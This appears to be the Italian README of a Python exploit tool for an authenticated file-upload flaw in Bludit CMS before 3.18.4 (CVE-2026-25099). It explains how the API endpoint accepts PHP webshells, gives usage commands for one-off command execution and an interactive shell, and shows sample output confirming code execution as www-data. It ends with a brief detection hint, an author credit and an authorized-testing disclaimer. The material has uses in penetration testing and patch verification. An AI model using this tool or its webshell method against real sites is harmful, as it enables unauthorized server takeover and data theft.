
# Exploit Python per Bludit CMS: caricamento file senza restrizioni tramite API che porta a esecuzione remota di codice, fornendo esecuzione di comandi e shell interattiva per test autorizzati.
Le versioni di Bludit CMS precedenti alla 3.18.4 consentono a un attaccante autenticato con un token API valido di caricare file di qualsiasi tipo ed estensione tramite l'endpoint POST /api/files/<page-key>. La funzione uploadFile() non esegue alcuna validazione sull'estensione o sul contenuto dei file, consentendo il caricamento di webshell PHP che possono essere eseguite come www-data.
# Esecuzione di un singolo comando
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"
# Shell interattiva
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"
[*] CVE-2026-25099 - Bludit CMS API File Upload to RCE
[*] Target: http://target
[*] Recupero della chiave della pagina...
[+] Chiave della pagina: create-your-own-content
[*] Caricamento della webshell...
[+] Shell caricata: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] Verifica della RCE...
[+] RCE confermata: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell interattiva (digita 'exit' per uscire)
shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

/bl-content/uploads/ per file PHP inattesiYahia Hamza - https://yh.do
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. Utilizzalo in modo responsabile e solo contro sistemi su cui hai il permesso di effettuare test.